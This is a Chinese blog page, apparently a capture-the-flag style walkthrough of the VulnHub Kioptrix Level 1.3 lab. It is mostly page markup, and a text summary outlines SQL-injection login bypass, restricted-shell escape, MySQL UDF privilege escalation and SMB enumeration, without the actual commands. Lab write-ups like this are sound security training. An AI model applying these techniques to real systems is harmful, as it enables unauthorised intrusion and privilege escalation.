<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><title>vulnhub-kioptrix_level 1.3 | hybcx</title><meta name="keywords" content="内网靶场"><meta name="author" content="hybcx,19815455497@163.com"><meta name="copyright" content="hybcx"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#f7f9fe"><meta name="mobile-web-app-capable" content="yes"><meta name="apple-touch-fullscreen" content="yes"><meta name="apple-mobile-web-app-title" content="vulnhub-kioptrix_level 1.3"><meta name="application-name" content="vulnhub-kioptrix_level 1.3"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="#f7f9fe"><meta property="og:type" content="article"><meta property="og:title" content="vulnhub-kioptrix_level 1.3"><meta property="og:url" content="http://hybcx.xyz/2023/09/24/kioptrix-level-1.3/index.html"><meta property="og:site_name" content="hybcx"><meta property="og:description" content="0x01 靶场信息 地址：https:&amp;#x2F;&amp;#x2F;www.vulnhub.com&amp;#x2F;entry&amp;#x2F;kioptrix-level-1-1,22&amp;#x2F; 发布日期：2010 年 2 月 17 日 难度：容易 目标：获取root shell  描述：This Kioptrix VM Image are easy chall"><meta property="og:locale" content="zh-CN"><meta property="og:image" content="https://bu.dusays.com/2023/04/27/64496e511b09c.jpg"><meta property="article:author" content="hybcx"><meta property="article:tag"><meta name="twitter:card" content="summary"><meta name="twitter:image" content="https://bu.dusays.com/2023/04/27/64496e511b09c.jpg"><meta name="description" content="0x01 靶场信息 地址：https:&amp;#x2F;&amp;#x2F;www.vulnhub.com&amp;#x2F;entry&amp;#x2F;kioptrix-level-1-1,22&amp;#x2F; 发布日期：2010 年 2 月 17 日 难度：容易 目标：获取root shell  描述：This Kioptrix VM Image are easy chall"><link rel="shortcut icon" href="/favicon.ico"><link rel="canonical" href="http://hybcx.xyz/2023/09/24/kioptrix-level-1.3/"><link rel="preconnect" href="//cdn.cbd.int"/><link rel="preconnect" href="//hm.baidu.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta name="google-site-verification" content="xxx"/><meta name="baidu-site-verification" content="code-xxx"/><meta name="msvalidate.01" content="xxx"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.cbd.int/node-snackbar@0.1.16/dist/snackbar.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.cbd.int/@fancyapps/ui@5.0.28/dist/fancybox/fancybox.css" media="print" onload="this.media='all'"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?d98ea8480e5ec98a243adfc7bd46b93a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script><script>const GLOBAL_CONFIG = {
  linkPageTop: {"enable":true,"title":"向✌们无限学习","addFriendPlaceholder":"昵称（请勿包含博客等字样）：\n网站地址（要求博客地址，请勿提交个人主页）：\n头像图片url（请提供尽可能清晰的图片，我会上传到我自己的图床）：\n描述：\n站点截图（可选）：\n"},
  peoplecanvas: undefined,
  postHeadAiDescription: {"enable":true,"gptName":"AnZhiYu","mode":"local","switchBtn":false,"btnLink":"https://afdian.net/item/886a79d4db6711eda42a52540025c377","randomNum":3,"basicWordCount":1000,"key":"xxxx","Referer":"https://xx.xx/"},
  diytitle: {"enable":true,"leaveTitle":"w(ﾟДﾟ)w 不要走！再看看嘛！","backTitle":"♪(^∇^*)欢迎肥来！"},
  LA51: {"enable":true,"ck":"3JLPGIZJOJw6Nvu2","LingQueMonitorID":"3JLPOLHV5W6IAty5"},
  greetingBox: {"enable":true,"default":"晚上好👋","list":[{"greeting":"晚安😴","startTime":0,"endTime":5},{"greeting":"早上好鸭👋, 祝你一天好心情！","startTime":6,"endTime":9},{"greeting":"上午好👋, 状态很好，鼓励一下～","startTime":10,"endTime":10},{"greeting":"11点多啦, 在坚持一下就吃饭啦～","startTime":11,"endTime":11},{"greeting":"午安👋, 宝贝","startTime":12,"endTime":14},{"greeting":"🌈充实的一天辛苦啦！","startTime":14,"endTime":18},{"greeting":"19点喽, 奖励一顿丰盛的大餐吧🍔。","startTime":19,"endTime":19},{"greeting":"晚上好👋, 在属于自己的时间好好放松😌~","startTime":20,"endTime":24}]},
  twikooEnvId: '',
  commentBarrageConfig:undefined,
  root: '/',
  preloader: {"source":3},
  friends_vue_info: undefined,
  navMusic: true,
  mainTone: undefined,
  authorStatus: {"skills":null},
  algolia: {"appId":"Z7A3XW4R2I","apiKey":"12db1ad54372045549ef465881c17e743","indexName":"my-hexo-blog","hits":{"per_page":6},"languages":{"input_placeholder":"输入关键词后按下回车查找","hits_empty":"找不到您查询的内容：${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简","rightMenuMsgToTraditionalChinese":"转为繁体","rightMenuMsgToSimplifiedChinese":"转为简体"},
  noticeOutdate: {"limitDay":365,"position":"top","messagePrev":"It has been","messageNext":"days since the last update, the content of the article may be outdated."},
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":330},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: true,
    simplehomepage: false,
    post: true
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"copy":true,"copyrightEbable":false,"limitCount":50,"languages":{"author":"作者: hybcx","link":"链接: ","source":"来源: hybcx","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。","copySuccess":"复制成功，复制和转载请标注本文地址"}},
  lightbox: 'mediumZoom',
  Snackbar: {"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#425AEF","bgDark":"#1f1f1f","position":"top-center"},
  source: {
    justifiedGallery: {
      js: 'https://cdn.cbd.int/flickr-justified-gallery@2.1.2/dist/fjGallery.min.js',
      css: 'https://cdn.cbd.int/flickr-justified-gallery@2.1.2/dist/fjGallery.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: true,
  isAnchor: false,
  shortcutKey: undefined,
  autoDarkmode: true
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  configTitle: 'hybcx',
  title: 'vulnhub-kioptrix_level 1.3',
  postAI: '',
  pageFillDescription: '0x01 靶场信息, 0x02 信息收集, 探测存活主机, 端口扫描, web目录扫描, web网站指纹扫描, 0x03 漏洞发现及利用, 万能密码登录获取用户信息, mysql-udf 提权, 找到flag, 0x04 靶场总结, 靶场echo命令探索, nikto漏扫初识, SMB  枚举, 0x05 文章总结, 0x06 参考文章靶场信息地址发布日期年月日难度容易目标获取描述这里在搭建也是费点脑子这里如上图下载好包之后发现只有一个的文件这里需要我们先在虚拟机上创建一个空的这里选择其他即可这里放在合适的地方安装好后进入虚拟机设置中将原先的硬盘删除掉换成我们下载好的文件即可下载好打开即可可能再打开的时候会报错他会提示让我们换成如下图的配置我们照做即可信息收集探测存活主机那目标机就是了端口扫描可以看到有如上四个端口的开启我们先访问看看如图是一个登录平台我们先看一下目录目录扫描测试一番发现如下信息估计是注入了网站指纹扫描此处似乎没什么重要信息但回过头来看了看泄露的信息漏洞发现及利用万能密码登录获取用户信息我瞬间就认为这可能是登录页面的信息但试了试没啥用接着便没思路了于是看了发现是我的扫的不行使用自带的竟然还能扫到一个后缀的话不多说我们访问看看好吧没什么卵用接着说尝试弱口令但我之前也尝试了却没成功还是怪自己经验少而且没耐心吧然后我跟着教程走发现还是不行结果换一个浏览器就好了真实玄学看来又多了一个经验我们输入如上信息即可得到用户信息接下来我又不知道干嘛了要不是看我又忘了可以尝试一下连接的但成功登陆之后奇怪的是什么命令也不能执行仔细一看发现这里似乎是自定义了一些命令符如图输入或者能查看可以使用什么命令不过还是很鸡肋我用遍了也不知道有啥有效信息看了发现又是知识盲区了他这里采用了一种提权方法其实我也应该往这里想的即使我不会但得有想法提权输出命令行因为菜的缘故我不理解他命令的操作原理于是问了一番果然就是好百度没找到的我一下子就透彻了这行代码看起来是用的函数在系统中执行了一个命令让我来解释一下这是一个命令用于在终端中打印文本在这里它被用作一个外部命令会打印这个字符串到终端这部分是代码它调用了函数该函数用于在操作系统中执行外部命令在这里传递给函数的参数是这是一个系统中的命令解释器也就是综合起来这行代码的作用是在系统中打印字符串到终端并尝试执行也就是启动一个新的进程这样如果运行这段代码你将会看到该字符串被打印到终端并且你会进入一个新的可以在其中执行其他命令和操作请注意执行这段代码需要足够的权限因为它尝试启动一个新的这种代码使用得当可以用于调用其他系统命令但也需要小心以免滥用或造成安全问题以上为回答总的来说命令行调用了命令来执行于是启动了一个新的进程恰好启动之后我们便可以使用更多的系统命令了理解止步于此请佬们嘴下留情这里跟着步骤看一个源码可以看到上述代码只对做了参数过滤并没有限制这也是万能密码成功的原因并且我们也可以看到数据库配置信息看了发现接下来就可以想到数据库提权了由于不熟悉命令就过来了这里登录的时候密码默认为空接下来佬又毫无理由的输入了一下命令以下是回答这是一个查询语句的起始部分表示你要执行一个查询操作通常用于从数据库中检索数据这是一个查询中的函数调用其中调用了一个名为的自定义函数并传递了一个参数给该函数根据函数名和参数的形式可以推断出这个函数的作用是执行系统命令是一个系统命令用于将用户添加到用户组这个命令通常用于管理用户和用户组的权限如果你的数据库支持并配置了函数并且具有足够的权限来执行系统命令那么执行这个查询将尝试执行命令将用户添加到用户组中我们发现执行如上命令便可以将加入到用户组了顺便解释一下上述命令各个参数的含义我也复习复习回答当解释命令时我们需要分解和解释各个参数的含义这是一个命令用于修改用户帐户的属性它的主要功能是管理用户帐户的属性例如更改用户名密码家目录等这是命令的选项和参数具体含义如下这个选项表示追加当与选项一起使用时它指示将用户添加到一个或多个附加的用户组中而不会将其从其他组中删除如果省略了选项用户将被从其他组中移除并且只会属于新指定的组这个部分表示将用户添加到名为的用户组中在中用户可以同时属于一个或多个用户组这个命令将用户添加到用户组这可能用于授予用户某些管理员权限或访问某些系统资源的权限这是要修改的用户的用户名在这种情况下命令将对用户名为的用户执行操作综合起来这个命令的含义是将用户添加到用户组而不会从任何其他组中删除他这通常用于管理用户的权限以便他可以访问组的资源或执行需要组权限的操作而不影响其在其他组的成员资格找到密码靶场总结靶场命令探索本着对知识的渴望与对自己学习的负责我继续搜寻了上述的含义功夫不负有心人我发现在此次靶场环境中之所以当前用户使用的命令极其有限是因为他处于一个的环境看这意思应该是对其简单的介绍受限软件限制用户行为有时我们需要限制登录到系统用户的行为最简单的办法莫过于限制其所能执行的命令是另一款可以实现这个功能的软件是由编写接着搜了半天如何突破受限制的环境发现都没有包含上述方法也就放弃了只需将此方法记住吧漏扫初识在这里我发现有篇文章用的是方法这里我也没接触过于是简单了解了一下是一个开源的扫描评估软件可以对服务器进行多项安全测试能在多种服务器上扫描出多种有潜在危险的文件及其他问题使用语言编写运行可以扫描指定主机的类型主机名指定目录特定漏洞返回主机允许的模式等具体可以参考漏洞扫描神器使用指南扫描工具使用枚举这里又发现一个新姿势根据端口信息发现存在服务使用对其进行枚举很神奇直接发现了三个用户未获取到版本号但枚举出用户名你以为就这样结束了用户名也可通过进行枚举接着佬又执行如下操作尝试对四个账户进行暴破暴破失败此思路仅供参考还有一点便是在此之前的注入漏洞中我们尝试在用户名或者密码处添加单引号会发现页面会有报错信息这时候就应该极度注意了但我却没有文章总结总的来说在此次靶场中思路依旧用上一个靶场框架并没发生大的改变但令我印象深刻的有各种工具的使用都未见过比如漏扫服务枚举处用户名甚至也可以枚举唉还是太菜什么都不知道接着浅浅了解了一下的密码爆破这里便是网站的手工漏洞判断了这次给我的教训有一定一定要关注任何登录框因为他极有可能存在注入倘若没有发现那大概率也是因为我菜不会判断而这次的漏洞中明明我都手工测试的时候看到了页面的报错信息但我却选择无视其实这已经说明了存在注入同时这也有在提示我未来要学会去搭建配置属于自己的强大字典不然就学会利用各种扫描工具来间接丰富字典内容不过前者肯定更完美最后便是一些提权类的内容这令我有点头疼但即使知识体系庞大我也不可退缩比如这次边了解到了如何突破受限制的环境以及的提权虽然本文未做介绍但我会记录一下学习的文章在此之后进行学习我将在下次靶场之前进一步学习提权以及逃逸参考文章渗透技巧如何逃逸的受限制执行任意命令靶场系列全集靶场之极度推荐级演练',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2023-09-25 19:19:12',
  postMainColor: '',
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
      win.saveToLocal = {
        set: (key, value, ttl) => {
          if (ttl === 0) return
          const now = Date.now()
          const expiry = now + ttl * 86400000
          const item = {
            value,
            expiry
          }
          localStorage.setItem(key, JSON.stringify(item))
        },
      
        get: key => {
          const itemStr = localStorage.getItem(key)
      
          if (!itemStr) {
            return undefined
          }
          const item = JSON.parse(itemStr)
          const now = Date.now()
      
          if (now > item.expiry) {
            localStorage.removeItem(key)
            return undefined
          }
          return item.value
        }
      }
    
      win.getScript = (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        script.onerror = reject
        script.onload = script.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          script.onload = script.onreadystatechange = null
          resolve()
        }

        Object.keys(attr).forEach(key => {
          script.setAttribute(key, attr[key])
        })

        document.head.appendChild(script)
      })
    
      win.getCSS = (url, id = false) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onerror = reject
        link.onload = link.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          link.onload = link.onreadystatechange = null
          resolve()
        }
        document.head.appendChild(link)
      })
    
      win.activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#18171d')
        }
      }
      win.activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#f7f9fe')
        }
      }
      const t = saveToLocal.get('theme')
    
          const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
          const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
          const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
          const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

          if (t === undefined) {
            if (isLightMode) activateLightMode()
            else if (isDarkMode) activateDarkMode()
            else if (isNotSpecified || hasNoSupport) {
              const now = new Date()
              const hour = now.getHours()
              const isNight = hour <= 6 || hour >= 18
              isNight ? activateDarkMode() : activateLightMode()
            }
            window.matchMedia('(prefers-color-scheme: dark)').addListener(e => {
              if (saveToLocal.get('theme') === undefined) {
                e.matches ? activateDarkMode() : activateLightMode()
              }
            })
          } else if (t === 'light') activateLightMode()
          else activateDarkMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
      const detectApple = () => {
        if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
          document.documentElement.classList.add('apple')
        }
      }
      detectApple()
    })(window)</script><meta name="generator" content="Hexo 7.2.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head><body data-type="anzhiyu"><div id="web_bg"></div><div id="an_music_bg"></div><div id="loading-box" onclick="document.getElementById(&quot;loading-box&quot;).classList.add(&quot;loaded&quot;)"><div class="loading-bg"><img class="loading-img nolazyload" alt="加载头像" src="https://npm.elemecdn.com/anzhiyu-blog-static@1.0.4/img/avatar.jpg"/><div class="loading-image-dot"></div></div></div><script>const preloader = {
  endLoading: () => {
    document.getElementById('loading-box').classList.add("loaded");
  },
  initLoading: () => {
    document.getElementById('loading-box').classList.remove("loaded")
  }
}
window.addEventListener('load',()=> { preloader.endLoading() })
setTimeout(function(){preloader.endLoading();},10000)

if (true) {
  document.addEventListener('pjax:send', () => { preloader.initLoading() })
  document.addEventListener('pjax:complete', () => { preloader.endLoading() })
}</script><link rel="stylesheet" href="https://cdn.cbd.int/anzhiyu-theme-static@1.1.10/progress_bar/progress_bar.css"/><script async="async" src="https://cdn.cbd.int/pace-js@1.2.4/pace.min.js" data-pace-options="{ &quot;restartOnRequestAfter&quot;:false,&quot;eventLag&quot;:false}"></script><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><div id="nav-group"><span id="blog_name"><div class="back-home-button"><i class="anzhiyufont anzhiyu-icon-grip-vertical"></i><div class="back-menu-list-groups"><div class="back-menu-list-group"><div class="back-menu-list-title">网页</div><div class="back-menu-list"><a class="back-menu-item" target="_blank" rel="noopener" href="https://blog.anheyu.com/" title="博客"><img class="back-menu-item-icon" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="/img/favicon.ico" alt="博客"/><span class="back-menu-item-text">博客</span></a></div></div><div class="back-menu-list-group"><div class="back-menu-list-title">项目</div><div class="back-menu-list"><a class="back-menu-item" target="_blank" rel="noopener" href="http://yansedaima.com/" title="颜色代码表"><img class="back-menu-item-icon" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://cdn.jsdelivr.net/gh/hybchenxing/blog-images/img/202408121908150.svg" alt="颜色代码表"/><span class="back-menu-item-text">颜色代码表</span></a></div></div></div></div><a id="site-name" href="/" accesskey="h"><div class="title">hybcx</div><i class="anzhiyufont anzhiyu-icon-house-chimney"></i></a></span><div class="mask-name-container"><div id="name-container"><a id="page-name" href="javascript:anzhiyu.scrollToDest(0, 500)">PAGE_NAME</a></div></div><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 文章</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/archives/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-box-archive"></use></svg><span> 隧道</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/categories/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-shapes"></use></svg><span> 分类</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/tags/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-tags"></use></svg><span> 标签</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 友链</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/link/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-link"></use></svg><span> 友人帐</span></a></li><li><a class="site-page child faa-parent animated-hover" href="/fcircle/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-artstation"></use></svg><span> 朋友圈</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 我的</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/music/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-music"></use></svg><span> 音乐馆</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span> 关于</span></a><ul class="menus_item_child"><li><a class="site-page child faa-parent animated-hover" href="/about/"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-paper-plane"></use></svg><span> 关于本人</span></a></li><li><a class="site-page child faa-parent animated-hover" href="javascript:toRandomPost()"><svg class="icon faa-tada" aria-hidden="true"><use xlink:href="#icon-shoe-prints1"></use></svg><span> 随便逛逛</span></a></li></ul></div></div></div><div id="nav-right"><div class="nav-button" id="randomPost_button"><a class="site-page" onclick="toRandomPost()" title="随机前往一个文章" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-dice"></i></a></div><div class="nav-button" id="search-button"><a class="site-page social-icon search" href="javascript:void(0);" title="搜索🔍" accesskey="s"><i class="anzhiyufont anzhiyu-icon-magnifying-glass"></i><span> 搜索</span></a></div><input id="center-console" type="checkbox"/><label class="widget" for="center-console" title="中控台" onclick="anzhiyu.switchConsole();"><i class="left"></i><i class="widget center"></i><i class="widget right"></i></label><div id="console"><div class="console-card-group-reward"><ul class="reward-all console-card"><li class="reward-item"><a href="https://npm.elemecdn.com/anzhiyu-blog@1.1.6/img/post/common/qrcode-weichat.png" target="_blank"><img class="post-qr-code-img" alt="微信" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://npm.elemecdn.com/anzhiyu-blog@1.1.6/img/post/common/qrcode-weichat.png"/></a><div class="post-qr-code-desc">微信</div></li><li class="reward-item"><a href="https://npm.elemecdn.com/anzhiyu-blog@1.1.6/img/post/common/qrcode-alipay.png" target="_blank"><img class="post-qr-code-img" alt="支付宝" src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null,this.src=&quot;/img/404.jpg&quot;" data-lazy-src="https://npm.elemecdn.com/anzhiyu-blog@1.1.6/img/post/common/qrcode-alipay.png"/></a><div class="post-qr-code-desc">支付宝</div></li></ul></div><div class="console-card-group"><div class="console-card-group-left"><div class="console-card" id="card-newest-comments"><div class="card-content"><div class="author-content-item-tips">互动</div><span class="author-content-item-title"> 最新评论</span></div><div class="aside-list"><span>正在加载中...</span></div></div></div><div class="console-card-group-right"><div class="console-card tags"><div class="card-content"><div class="author-content-item-tips">兴趣点</div><span class="author-content-item-title">寻找你感兴趣的领域</span><div class="card-tags"><div class="item-headline"></div><div class="card-tag-cloud"><a href="/tags/CTF%E8%B5%9B%E4%BA%8B/" style="font-size: 1.05rem;">CTF赛事<sup>18</sup></a><a href="/tags/CVE/" style="font-size: 1.05rem;">CVE<sup>15</sup></a><a href="/tags/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 1.05rem;">Java反序列化<sup>3</sup></a><a href="/tags/Java%E5%9F%BA%E7%A1%80/" style="font-size: 1.05rem;">Java基础<sup>1</sup></a><a href="/tags/Linux%E6%8F%90%E6%9D%83/" style="font-size: 1.05rem;">Linux提权<sup>2</sup></a><a href="/tags/MISC/" style="font-size: 1.05rem;">MISC<sup>1</sup></a><a href="/tags/Metasploit/" style="font-size: 1.05rem;">Metasploit<sup>3</sup></a><a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 1.05rem;">PHP代码审计<sup>2</sup></a><a href="/tags/SecBook/" style="font-size: 1.05rem;">SecBook<sup>1</sup></a><a href="/tags/TryHackMe/" style="font-size: 1.05rem;">TryHackMe<sup>36</sup></a><a href="/tags/Windows%E6%8F%90%E6%9D%83/" style="font-size: 1.05rem;">Windows提权<sup>2</sup></a><a href="/tags/reverse%E7%B3%BB%E5%88%97/" style="font-size: 1.05rem;">reverse系列<sup>2</sup></a><a href="/tags/tryhackme/" style="font-size: 1.05rem;">tryhackme<sup>1</sup></a><a href="/tags/web%E6%B8%97%E9%80%8F/" style="font-size: 1.05rem;">web渗透<sup>2</sup></a><a href="/tags/web%E7%9F%A5%E8%AF%86%E6%80%BB%E7%BB%93/" style="font-size: 1.05rem;">web知识总结<sup>2</sup></a><a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 1.05rem;">代码审计<sup>1</sup></a><a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" style="font-size: 1.05rem;">内网渗透<sup>3</sup></a><a href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/" style="font-size: 1.05rem;">内网靶场<sup>2</sup></a><a href="/tags/%E5%9F%BA%E6%9C%AC%E7%9F%A5%E8%AF%86/" style="font-size: 1.05rem;">基本知识<sup>21</sup></a><a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" style="font-size: 1.05rem;">基础知识<sup>1</sup></a><a href="/tags/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C/" style="font-size: 1.05rem;">攻防世界<sup>1</sup></a><a href="/tags/%E7%8E%84%E6%9C%BA%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E9%9D%B6%E5%9C%BA/" style="font-size: 1.05rem;">玄机应急响应靶场<sup>1</sup></a><a href="/tags/%E7%BA%A2%E9%98%9F%E6%B8%97%E9%80%8F/" style="font-size: 1.05rem;">红队渗透<sup>1</sup></a></div></div><hr/></div></div><div class="console-card history"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-box-archiv"></i><span>文章</span></div><div class="card-archives"><div class="item-headline"><i class="anzhiyufont anzhiyu-icon-archive"></i><span>归档</span><a class="card-more-btn" href="/archives/" title="查看更多">
    <i class="anzhiyufont anzhiyu-icon-angle-right"></i></a></div><ul class="card-archive-list"><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/08/"><span class="card-archive-list-date">八月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">7</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/07/"><span class="card-archive-list-date">七月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">16</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/06/"><span class="card-archive-list-date">六月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">9</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/05/"><span class="card-archive-list-date">五月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">7</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/04/"><span class="card-archive-list-date">四月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">5</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/03/"><span class="card-archive-list-date">三月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">18</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/02/"><span class="card-archive-list-date">二月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">12</span><span>篇</span></div></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/01/"><span class="card-archive-list-date">一月 2024</span><div class="card-archive-list-count-group"><span class="card-archive-list-count">2</span><span>篇</span></div></a></li></ul></div><hr/></div></div></div><div class="button-group"><div class="console-btn-item"><a class="darkmode_switchbutton" title="显示模式切换" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-moon"></i></a></div><div class="console-btn-item" id="consoleHideAside" onclick="anzhiyu.hideAsideBtn()" title="边栏显示控制"><a class="asideSwitch"><i class="anzhiyufont anzhiyu-icon-arrows-left-right"></i></a></div><div class="console-btn-item" id="consoleMusic" onclick="anzhiyu.musicToggle()" title="音乐开关"><a class="music-switch"><i class="anzhiyufont anzhiyu-icon-music"></i></a></div></div><div class="console-mask" onclick="anzhiyu.hideConsole()" href="javascript:void(0);"></div></div><div class="nav-button" id="nav-totop"><a class="totopbtn" href="javascript:void(0);"><i class="anzhiyufont anzhiyu-icon-arrow-up"></i><span id="percent" onclick="anzhiyu.scrollToDest(0,500)">0</span></a></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);" title="切换"><i class="anzhiyufont anzhiyu-icon-bars"></i></a></div></div></div></nav><div id="post-info"><div id="post-firstinfo"><div class="meta-firstline"><a class="post-meta-original">原创</a><span class="post-meta-categories"><span class="post-meta-separator"></span><i class="anzhiyufont anzhiyu-icon-inbox post-meta-icon"></i><a class="post-meta-categories" href="/categories/vulnhub%E7%B3%BB%E5%88%97/" itemprop="url">vulnhub系列</a></span><span class="article-meta tags"><a class="article-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/" tabindex="-1" itemprop="url"> <span> <i class="anzhiyufont anzhiyu-icon-hashtag"></i>内网靶场</span></a></span></div></div><h1 class="post-title" itemprop="name headline">vulnhub-kioptrix_level 1.3</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="anzhiyufont anzhiyu-icon-calendar-days post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" itemprop="dateCreated datePublished" datetime="2023-09-24T10:52:10.155Z" title="发表于 